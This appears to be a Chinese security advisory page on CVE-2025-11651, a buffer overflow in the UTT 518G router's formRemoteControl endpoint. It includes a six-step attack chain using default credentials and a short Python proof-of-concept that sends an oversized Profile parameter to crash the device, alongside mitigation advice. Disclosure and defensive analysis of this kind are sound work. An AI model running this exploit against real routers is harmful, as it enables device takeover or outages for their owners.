IPBUF安全漏洞报告
English
CVE-2025-11651 CVSS 8.8 高危

CVE-2025-11651:UTT进取518G路由器远程命令注入缓冲区溢出漏洞

披露日期: 2025-10-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-11651
漏洞类型
缓冲区溢出
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
UTT 进取 518G 路由器

相关标签

缓冲区溢出Buffer OverflowUTT进取518G路由器Router远程代码执行RCEformRemoteControl高危漏洞

漏洞概述

CVE-2025-11651是UTT(United Telecommunication Technology)进取518G路由器固件中发现的一个高危安全漏洞。该漏洞存在于路由器管理接口的/goform/formRemoteControl端点中的sub_4247AC函数中,攻击者通过操纵Profile参数可以触发缓冲区溢出漏洞。该漏洞的CVSS 3.1评分为8.8分,属于高危级别,攻击者可以通过网络远程利用该漏洞,且仅需要低权限认证即可执行攻击,无需用户交互。

UTT进取518G是一款面向中小企业及家庭用户的无线路由器产品,在国内外市场拥有一定的用户群体。该漏洞影响固件版本至V3v3.2.7-210919-161313的所有版本。由于漏洞利用成功后可能导致远程代码执行,攻击者可以完全控制受影响的路由器设备,进而窃取网络流量、植入后门、进行中间人攻击或将设备纳入僵尸网络。

值得注意的是,该漏洞的详细信息已经公开披露,且存在可用的概念验证(PoC)代码,这大大降低了漏洞被恶意利用的门槛。安全研究员曾尝试联系UTT厂商报告此漏洞,但厂商未做出任何回应,因此该漏洞至今仍未得到修复。鉴于路由器作为网络边界设备的重要性,此漏洞对企业和家庭网络安全构成严重威胁。

技术细节

该漏洞的根本原因在于/goform/formRemoteControl端点中的sub_4247AC函数在处理Profile参数时缺乏充分的输入验证和缓冲区边界检查。具体而言,当路由器接收到包含恶意构造的Profile参数的HTTP请求时,该函数会将用户输入的数据复制到固定大小的栈缓冲区中,而没有正确限制输入数据的长度,从而导致经典的栈缓冲区溢出。

从技术层面分析,攻击者可以通过构造超长或特殊格式的Profile参数值,覆盖栈上的返回地址和关键控制数据(如保存的EBP、ESI等寄存器),进而劫持程序执行流程。成功利用后,攻击者可以在路由器上执行任意代码,获取设备的完全控制权限。

由于该漏洞的攻击向量为网络(AV:N),攻击复杂度低(AC:L),且仅需要低权限认证(PR:L),攻击者可以在拥有路由器管理账户凭据的情况下远程发起攻击。漏洞的成功利用会对系统的机密性、完整性和可用性均产生高影响(C:H/I:H/A:H),可能导致路由器配置被篡改、敏感信息泄露、设备变砖或被用作进一步攻击的跳板。

攻击链分析

STEP 1
步骤1:信息收集
攻击者通过Shodan、ZoomEye等网络空间搜索引擎识别暴露在公网上的UTT进取518G路由器设备,确定目标设备的IP地址和管理端口。
STEP 2
步骤2:获取认证凭据
由于漏洞仅需要低权限认证,攻击者可以通过暴力破解、默认凭据(如admin/admin)或社工方式获取路由器的管理账户登录凭据。
STEP 3
步骤3:登录路由器
使用获取的凭据通过/goform/login端点登录路由器管理界面,建立有效的会话认证。
STEP 4
步骤4:构造恶意Payload
构造包含超长Profile参数的HTTP POST请求,Payload长度超过sub_4247AC函数中目标缓冲区的容量,触发栈缓冲区溢出。
STEP 5
步骤5:发送攻击请求
向/goform/formRemoteControl端点发送包含恶意Profile参数的请求,触发缓冲区溢出漏洞,可能导致设备崩溃或执行任意代码。
STEP 6
步骤6:控制设备
成功利用后,攻击者可以执行任意代码,完全控制路由器设备,进而窃取网络流量、植入持久化后门或将该设备纳入僵尸网络。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2025-11651 PoC - UTT 518G Router Buffer Overflow # Vulnerability: Buffer overflow in sub_4247AC via Profile parameter # Endpoint: /goform/formRemoteControl import requests import sys TARGET = "http://192.168.1.1" # Default router IP, modify as needed AUTH_USER = "admin" AUTH_PASS = "admin" # Default credentials or obtained low-privilege credentials def exploit(target, username, password): """ Exploit buffer overflow in UTT 518G formRemoteControl endpoint. The Profile parameter is not properly validated, allowing buffer overflow. """ session = requests.Session() # Step 1: Authenticate to obtain low-privilege session login_url = f"{target}/goform/login" login_data = { "username": username, "password": password } session.post(login_url, data=login_data) # Step 2: Trigger buffer overflow via Profile parameter vuln_url = f"{target}/goform/formRemoteControl" # Malicious payload - oversized Profile parameter to overflow buffer # Adjust payload size based on the buffer length in sub_4247AC payload = "A" * 4096 # Overflow payload overflow_data = { "Profile": payload } print(f"[*] Sending exploit to {vuln_url}") try: response = session.post(vuln_url, data=overflow_data, timeout=10) print(f"[*] Response status: {response.status_code}") if response.status_code == 500 or "error" in response.text.lower(): print("[+] Target appears vulnerable (crash detected)") except requests.exceptions.Timeout: print("[+] Target appears vulnerable (timeout/crash detected)") except requests.exceptions.ConnectionError: print("[+] Target appears vulnerable (connection refused - crash)") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = sys.argv[1] if len(sys.argv) > 1 else TARGET exploit(target, AUTH_USER, AUTH_PASS)

影响范围

UTT 进取 518G ≤ V3v3.2.7-210919-161313

防御指南

临时缓解措施
由于UTT厂商未对该漏洞披露做出回应且未发布修复补丁,建议用户立即采取以下临时缓解措施:1)修改路由器默认登录凭据,使用强密码防止认证凭据泄露;2)禁用路由器的远程管理功能,将管理访问限制在可信的局域网内;3)在边界防火墙或路由器上配置访问控制规则,阻止外部网络对/goform/formRemoteControl等管理端点的访问;4)部署网络监控措施,检测异常的HTTP POST请求和异常的Profile参数;5)考虑使用其他仍在维护的路由器产品替换受影响的设备,以彻底消除风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表